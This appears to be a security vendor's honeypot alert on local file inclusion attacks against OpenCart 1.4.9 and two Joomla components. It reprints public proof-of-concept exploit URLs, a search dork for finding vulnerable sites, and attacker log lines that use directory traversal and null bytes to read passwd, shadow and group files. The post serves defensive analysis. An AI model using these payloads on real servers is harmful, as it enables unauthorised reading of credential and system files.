[Honeypot Alert] Multiple Local File Inclusion Attacks

Our web server honeypot log analysis has picked up some targeted local file inclusion (LFI) attacks against few specific PHP components.

OpenCart v1.4.9 LFI

Here is PoC exploit code:

#### Title : OpenCart 1.4.9 LFI Multiple Vulnerability# Author : KedAns-Dz# E-mail : ked-h@hotmail.com# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)# Twitter page : twitter.com/kedans# platform : php# Impact : Multi LFI# Tested on : Windows XP sp3 FR#### Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )### [»] Go0gle Dork : "Powered by opencart 1.4.9"#### Exploit : http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI]%00http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI]%00http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00=================================================================================================

Attack Examples

96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"

Notice that these LFI payloads are using Nul Bytes (%00) to terminate the injection and then appending the expected/allowed file extension (.php).

Joomla Component com_svmap v1.1.1

Here is PoC exploit code:

================================================================================================  Title    : Joomla Component com_svmap v1.1.1 LFI Vulnerability Vendor   : http://www.la-souris-verte.com   Date     : Monday, 05 April 2010 (Indonesia) Author   : Vrs-hCk Contact  : ander[at]antisecurity.org Blog     : http://c0li.blogspot.com/  ================================================================================================  [+] Exploit      http://[site]/[path]/index.php?option=com_svmap&controller=[LFI]  [+] PoC      http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00  ================================================================================================

Attack Examples

91.215.216.44 - - [08/Jan/2012:15:07:15 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:16 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:21 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 21691.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216

Joomla Component com_blog directory traversal

Here is PoC exploit code:

[~]######################################### InformatioN #############################################[~] [~] Title     : Joomla Component com_blog LFI Vulnerability[~] Author    : DevilZ TM By D3v1l[~] Homepage  : http://www.DEVILZTM.com[~] Contact   : DevilZTM@Gmail.CoM & D3v1l.blackhat@gmail.com [~]######################################### ExploiT #################################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI] [~] ExploiT         : ../../../../../../../../etc/passwd%00 [~] Example         : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00 

Attack Examples

69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.